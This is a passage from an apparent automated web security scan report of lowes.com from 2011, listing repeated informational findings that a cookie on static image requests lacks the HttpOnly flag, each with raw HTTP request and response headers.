Date: Tue, 12 Jul 2011 21:32:08 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:08 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR.......?.......&.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.326. http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area4_Clearance.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110705_area4_Clearance.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110705_area4_Clearance.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 04 Jul 2011 13:14:16 GMT
Accept-Ranges: bytes
Content-Length: 3780
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:51 GMT
Connection: close
Set-Cookie: akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

.PNG
.
...IHDR...2...7.....y,.0....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.327. http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area5_GiftCards.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110705_area5_GiftCards.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110705_area5_GiftCards.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 19:32:10 GMT
Accept-Ranges: bytes
Content-Length: 20394
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:51 GMT
Connection: close
Set-Cookie: akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

.PNG
.
...IHDR.......4.....R.~t....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.328. http://www.lowes.com/campaign/summer/2011/images/homepage/20110706_control_Flooring.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110706_control_Flooring.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110706_control_Flooring.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 05 Jul 2011 14:49:01 GMT
Accept-Ranges: bytes
Content-Length: 3946
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR...5...6.....P.!.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.329. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Flooring.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110712_area2_Flooring.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110712_area2_Flooring.jpg HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 18:32:39 GMT
Accept-Ranges: bytes
Content-Length: 109219
Content-Type: image/jpeg
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:49 GMT
Connection: close
Set-Cookie: akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

......Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

11.330. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Refrigeration.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110712_area2_Refrigeration.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110712_area2_Refrigeration.jpg HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 18:05:44 GMT
Accept-Ranges: bytes
Content-Length: 78951
Content-Type: image/jpeg
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:49 GMT
Connection: close
Set-Cookie: akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

......Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

11.331. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Bali.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110712_area4_Bali.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110712_area4_Bali.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 15:14:34 GMT
Accept-Ranges: bytes
Content-Length: 4420
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:51 GMT
Connection: close
Set-Cookie: akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

.PNG
.
...IHDR...2...7.....N.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.332. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_OPE.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110712_area4_OPE.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110712_area4_OPE.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 11 Jul 2011 18:28:59 GMT
Accept-Ranges: bytes
Content-Length: 6225
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR...2...7.....N.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.333. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Shutters.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110712_area4_Shutters.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110712_area4_Shutters.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 15:14:34 GMT
Accept-Ranges: bytes
Content-Length: 3560
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:51 GMT
Connection: close
Set-Cookie: akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

.PNG
.
...IHDR...2...7.....N.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.334. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Tools.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110712_area4_Tools.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110712_area4_Tools.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 15:14:34 GMT
Accept-Ranges: bytes
Content-Length: 5586
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:51 GMT
Connection: close
Set-Cookie: akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

.PNG
.
...IHDR...2...7.....N.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.335. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area6b_Organization.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110712_area6b_Organization.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110712_area6b_Organization.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 08 Jul 2011 18:23:49 GMT
Accept-Ranges: bytes
Content-Length: 35990
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:51 GMT
Connection: close
Set-Cookie: akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

.PNG
.
...IHDR...............T1....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.336. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_control_Refrigeration.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110712_control_Refrigeration.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110712_control_Refrigeration.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 18:05:44 GMT
Accept-Ranges: bytes
Content-Length: 3614
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:49 GMT
Connection: close
Set-Cookie: akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

.PNG
.
...IHDR...5...6.....P.!.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.337. http://www.lowes.com/campaign/summer/2011/images/homepage/arrow_status.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/arrow_status.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/arrow_status.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 20 Jun 2011 12:28:46 GMT
Accept-Ranges: bytes
Content-Length: 495
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:32:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:08 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:08 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR...............g}....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...=K.P..S[[.......6. N....tu..tps+.?@......]:......B..Tb........X..8.K.{..\.""M.....l.....b.Pf......qX .@.....DK@0.(k...
...[SNIP]...

11.338. http://www.lowes.com/campaign/summer/2011/images/homepage/bullet.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/bullet.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/bullet.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 22 Jun 2011 18:08:28 GMT
Accept-Ranges: bytes
Content-Length: 986
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:32:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:08 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:08 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR................z....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.339. http://www.lowes.com/campaign/summer/2011/images/homepage/green_background.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/green_background.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/green_background.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 22 Jun 2011 13:39:59 GMT
Accept-Ranges: bytes
Content-Length: 11458
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:32:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:08 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:08 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR...............j.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.340. http://www.lowes.com/images/auxnav/auxnavbg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/auxnav/auxnavbg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/auxnav/auxnavbg.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 08 Feb 2011 19:39:23 GMT
Accept-Ranges: bytes
Content-Length: 183
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:32:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:08 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:08 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR.......~.....j......~IDAT....A..0.....?+.... Q.uO=D2......H.. ..T,.....=s..T...-v...Oc.jn..HkV^C#..|$$) I..j?.t..-.........Z..'.....S...7.....c..m~p.U.........IEND.B`.

11.341. http://www.lowes.com/images/bg-category-li.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/bg-category-li.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508129~id=d732280edae397398f4298647e05dba4; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bg-category-li.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 04 Nov 2010 17:03:54 GMT
Accept-Ranges: bytes
Content-Length: 89
Content-Type: image/gif
Expires: Tue, 12 Jul 2011 21:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:09 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:09 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508129~id=d732280edae397398f4298647e05dba4; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a.......................................................,..................u. I14..;

11.342. http://www.lowes.com/images/bg-page.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/bg-page.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508129~id=d732280edae397398f4298647e05dba4; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bg-page.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 04 Nov 2010 17:03:54 GMT
Accept-Ranges: bytes
Content-Length: 906
Content-Type: image/gif
Expires: Tue, 12 Jul 2011 21:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
